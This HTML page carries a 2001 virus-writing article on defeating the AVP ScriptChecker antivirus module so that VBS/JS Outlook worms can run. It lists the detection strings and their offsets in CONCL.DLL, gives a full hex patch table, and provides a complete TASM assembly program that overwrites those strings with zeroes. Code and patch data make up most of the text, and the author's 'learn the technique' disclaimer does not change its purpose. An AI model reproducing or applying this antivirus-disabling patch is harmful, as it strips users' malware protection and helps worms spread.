<html>

<head>
<title>Defeating AVP ScriptChecker</title>
</head>

<body bgcolor="#000000" text="#00CCFF" link="#00CCFF" vlink="#00CCFF" alink="#00CCFF">

<p><font face="Times New Roman">=============================<br>
 Defeating AVP ScriptChecker<br>
-----------------------------<br>
  Written by LiteSYS/XAKER<br>
      Venezuela - 2001<br>
=============================<br>
<br>
<br>
  INTRO<br>
  ~~~~~<br>
<br>
  AVP ScriptChecker is a real pain in the ass, mainly because it monitors<br>
  every VBScript and JScript that is run and will deny the execution of<br>
  those scripts with the following strings:<br>
<br>
  - .AddressEntries<br>
  - .Attachments<br>
  - .HTMLBody<br>
  - .Attach<br>
  - .Send<br>
  - .AddressLists<br>
  - Outlook.Application<br>
<br>
  Rendering every VBS/JS Outlook Worm to the uselessness by putting<br>
  a dialog with the "This script contains instructions that are<br>
  virus-like" text and a "Deny" button...<br>
<br>
  But it can be (very easily) defeated, you only need to have some assembly<br>
  skills to do what i'll show you. Albeit it's a very lame way, it works<br>
  very fine.<br>
<br>
  THE BASICS<br>
  ~~~~~~~~~~<br>
<br>
  You may take a look at the AVP directory files and find something<br>
  called AVPSCRCH.DLL which is the main DLL but it's totally<br>
  noninteresting because it loads another one called CONCL.DLL.<br>
<br>
  CONCL.DLL is the interesting one, and contains the strings<br>
  (in my AVP v3.5.133):<br>
<br>
  first byte address             string<br>
<br>
  5080                            .attachments<br>
  5090                            .htmlbody<br>
  509C                            .attach<br>
  50A4                            .send<br>
  50AC                            .addresslists<br>
  50BC                            outlook.application<br>
<br>
  Those are the strings used by the Script Checker, so when a VBS/JS<br>
  Script is run and contains those strings, the dialog mentioned<br>
  above will appear and your worm won't run =(.<br>
<br>
  Deleting the file will be a very stupid way because the script<br>
  won't run anymore.<br>
<br>
  So what are we going to do? Patch the file! just by changing those<br>
  strings with nonsense stuff, so the Script Checker will search for<br>
  those "nonsense stuff" strings instead of searching for our beloved<br>
  worm strings, and as you may imagine, our proggie will run with no<br>
  problemo.<br>
<br>
  It's logic that the "nonsense stuff" strings length must be the<br>
  same as the other strings, for example, the ".attachments" string<br>
  is 12 bytes long, so we must overwrite it with another 12 bytes<br>
  long nonsense string.<br>
<br>
  In the 3.5.133 AVP Build of CONCL.DLL, those are the following<br>
  values we are going to change (this time the "nonsense stuff"<br>
  are just ascii zero (30) chars):<br>
<br>
---------------------<br>
00005071: 61 30<br>
00005072: 64 30<br>
00005073: 64 30<br>
00005074: 72 30<br>
00005075: 65 30<br>
00005076: 73 30<br>
00005077: 73 30<br>
00005078: 65 30<br>
00005079: 6E 30<br>
0000507A: 74 30<br>
0000507B: 72 30<br>
0000507C: 69 30<br>
0000507D: 65 30<br>
0000507E: 73 30<br>
00005081: 61 30<br>
00005082: 74 30<br>
00005083: 74 30<br>
00005084: 61 30<br>
00005085: 63 30<br>
00005086: 68 30<br>
00005087: 6D 30<br>
00005088: 65 30<br>
00005089: 6E 30<br>
0000508A: 74 30<br>
0000508B: 73 30<br>
00005091: 68 30<br>
00005092: 74 30<br>
00005093: 6D 30<br>
00005094: 6C 30<br>
00005095: 62 30<br>
00005096: 6F 30<br>
00005097: 64 30<br>
00005098: 79 30<br>
0000509D: 61 30<br>
0000509E: 74 30<br>
0000509F: 74 30<br>
000050A0: 61 30<br>
000050A1: 63 30<br>
000050A2: 68 30<br>
000050A5: 73 30<br>
000050A6: 65 30<br>
000050A7: 6E 30<br>
000050A8: 64 30<br>
000050AD: 61 30<br>
000050AE: 64 30<br>
000050AF: 64 30<br>
000050B0: 72 30<br>
000050B1: 65 30<br>
000050B2: 73 30<br>
000050B3: 73 30<br>
000050B4: 6C 30<br>
000050B5: 69 30<br>
000050B6: 73 30<br>
000050B7: 74 30<br>
000050B8: 73 30<br>
000050BD: 75 30<br>
000050BE: 74 30<br>
000050BF: 6C 30<br>
000050C0: 6F 30<br>
000050C1: 6F 30<br>
000050C2: 6B 30<br>
000050C3: 2E 30<br>
000050C4: 61 30<br>
000050C5: 70 30<br>
000050C6: 70 30<br>
000050C7: 6C 30<br>
000050C8: 69 30<br>
000050C9: 63 30<br>
000050CA: 61 30<br>
000050CB: 74 30<br>
000050CC: 69 30<br>
000050CD: 6F 30<br>
000050CE: 6E 30<br>
---------------------<br>
<br>
  As I said before, it's a very lame way... but not as lame as deleting<br>
  the file... so here is the "generic patch", just use it to learn the<br>
  technique, don't rip it, code your own one =D.<br>
<br>
  BTW, the code sucks, is not optimized and is very redundant, but it<br>
  was meant to be easily understandable!.. so here it is:<br>
<br>
---------------------<br>
.386<br>
.MODEL FLAT, STDCALL<br>
LOCALS<br>
JUMPS<br>
<br>
INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC<br>
INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC<br>
<br>
EXTRN ExitProcess:PROC<br>
EXTRN CreateFileA:PROC<br>
EXTRN CreateFileMappingA:PROC<br>
EXTRN MapViewOfFile:PROC<br>
EXTRN UnmapViewOfFile:PROC<br>
EXTRN CloseHandle:PROC<br>
EXTRN MessageBoxA:PROC<br>
<br>
.DATA<br>
 DD 00000000h<br>
.CODE<br>
<br>
PROG:<br>
     PUSH NULL<br>
     PUSH FILE_ATTRIBUTE_NORMAL<br>
     PUSH OPEN_EXISTING<br>
     PUSH NULL<br>
     PUSH NULL<br>
     PUSH GENERIC_READ + GENERIC_WRITE<br>
     PUSH OFFSET CONCL<br>
     CALL CreateFileA                      ; Open the file<br>
     MOV DWORD PTR [FHANDLE], EAX<br>
     INC EAX<br>
     JZ NOS_JODIMOS<br>
<br>
     PUSH NULL<br>
     PUSH NULL<br>
     PUSH NULL<br>
     PUSH PAGE_READWRITE<br>
     PUSH NULL<br>
     PUSH DWORD PTR [FHANDLE]<br>
     CALL CreateFileMappingA               ; Create a File Mapping Object.<br>
     MOV DWORD PTR [MAPHANDLE], EAX<br>
     OR EAX, EAX<br>
     JZ NOS_JODIMOS<br>
<br>
     PUSH NULL<br>
     PUSH NULL<br>
     PUSH NULL<br>
     PUSH FILE_MAP_WRITE + FILE_MAP_READ<br>
     PUSH DWORD PTR [MAPHANDLE]<br>
     CALL MapViewOfFile                    ; Map the file in memory<br>
     MOV DWORD PTR [BASEMAP], EAX          ; And get the Base Address.<br>
     OR EAX, EAX<br>
     JZ NOS_JODIMOS<br>
<br>
     MOV EDI, BASEMAP<br>
     ADD EDI, 5070h<br>
     CMP DWORD PTR [EDI], "dda."     ; Is it our string?&nbsp;<br>
     JNE NOS_JODIMOS                 ; No...<br>
<br>
     INC EDI<br>
     MOV ECX, 0Eh<br>
     MOV AL, '0'<br>
     REP STOSB                       ; Replace it with zeroes.<br>
<br>
     MOV EDI, BASEMAP<br>
     ADD EDI, 5080h<br>
     CMP DWORD PTR [EDI], "tta."    ; Is it our string?&nbsp;<br>
     JNE NOS_JODIMOS                ; No...<br>
<br>
     INC EDI<br>
     MOV ECX, 0Bh<br>
     MOV AL, '0'<br>
     REP STOSB                       ; Replace it with zeroes.<br>
<br>
     MOV EDI, BASEMAP<br>
     ADD EDI, 5090h<br>
     CMP DWORD PTR [EDI], "mth."    ; Is it our string?<br>
     JNE NOS_JODIMOS                ; No...<br>
<br>
     INC EDI<br>
     MOV ECX, 08h<br>
     MOV AL, '0'<br>
     REP STOSB                       ; Replace it with zeroes.<br>
<br>
     MOV EDI, BASEMAP<br>
     ADD EDI, 509Ch<br>
     CMP DWORD PTR [EDI], "tta."    ; Is it our string?<br>
     JNE NOS_JODIMOS                ; No...<br>
<br>
     INC EDI<br>
     MOV ECX, 06h<br>
     MOV AL, '0'<br>
     REP STOSB                       ; Replace it with zeroes.<br>
<br>
     MOV EDI, BASEMAP<br>
     ADD EDI, 50A4h<br>
     CMP DWORD PTR [EDI], "nes."    ; Is it our string?<br>
     JNE NOS_JODIMOS                ; No...<br>
<br>
     INC EDI<br>
     MOV ECX, 04h<br>
     MOV AL, '0'<br>
     REP STOSB                       ; Replace it with zeroes.<br>
<br>
     MOV EDI, BASEMAP<br>
     ADD EDI, 50ACh<br>
     CMP DWORD PTR [EDI], "dda."    ; Is it our string?<br>
     JNE NOS_JODIMOS                ; No...<br>
<br>
     INC EDI<br>
     MOV ECX, 0Ch<br>
     MOV AL, '0'<br>
     REP STOSB                       ; Replace it with zeroes.<br>
<br>
     MOV EDI, BASEMAP<br>
     ADD EDI, 50BCh&nbsp;<br>
     CMP DWORD PTR [EDI], "ltuo"    ; Is it our string?<br>
     JNE NOS_JODIMOS                ; No...<br>
<br>
     INC EDI<br>
     MOV ECX, 12h<br>
     MOV AL, '0'<br>
     REP STOSB                       ; Replace it with zeroes.<br>
<br>
     PUSH BASEMAP<br>
     CALL UnmapViewOfFile           ; Unmap the file.<br>
<br>
     PUSH [MAPHANDLE]<br>
     CALL CloseHandle               ; Close the file mapping object.<br>
<br>
     PUSH [FHANDLE]<br>
     CALL CloseHandle               ; Close the file.<br>
<br>
     JMP TODO_BIEN<br>
<br>
     NOS_JODIMOS:<br>
     PUSH 0<br>
     PUSH OFFSET TITULO<br>
     PUSH OFFSET NOSJO<br>
     PUSH 0<br>
     CALL MessageBoxA<br>
<br>
     JMP FINALE<br>
<br>
     TODO_BIEN:<br>
     PUSH 0<br>
     PUSH OFFSET TITULO<br>
     PUSH OFFSET BIENB<br>
     PUSH 0<br>
     CALL MessageBoxA<br>
<br>
     FINALE:<br>
     PUSH 0<br>
     CALL ExitProcess<br>
<br>
     FHANDLE   DD 00000000h<br>
     MAPHANDLE DD 00000000h<br>
     BASEMAP   DD 00000000h<br>
<br>
     CONCL  DB "CONCL.DLL", 00h<br>
     TITULO DB "LiteSYS' AVP ScriptChecker Patch.", 00h<br>
     NOSJO  DB "FILE NOT PATCHED", 00h<br>
     BIENB  DB "FILE SUCCESFULY PATCHED", 00h<br>
<br>
END PROG<br>
---------------------<br>
<br>
  I hope this helped you...<br>
<br>
  That's all.<br>
<br>
  Any comment/correction/question can be sent to liteno2@softhome.net.<br>
  If it's a very important thing, use my PGP public key.<br>
<br>
  Peace,<br>
  LiteSYS.<br>
  Venezuela - 2001<br>
  http://www.xakercentral.com<br>
</font>
</p>

</body>

</html>
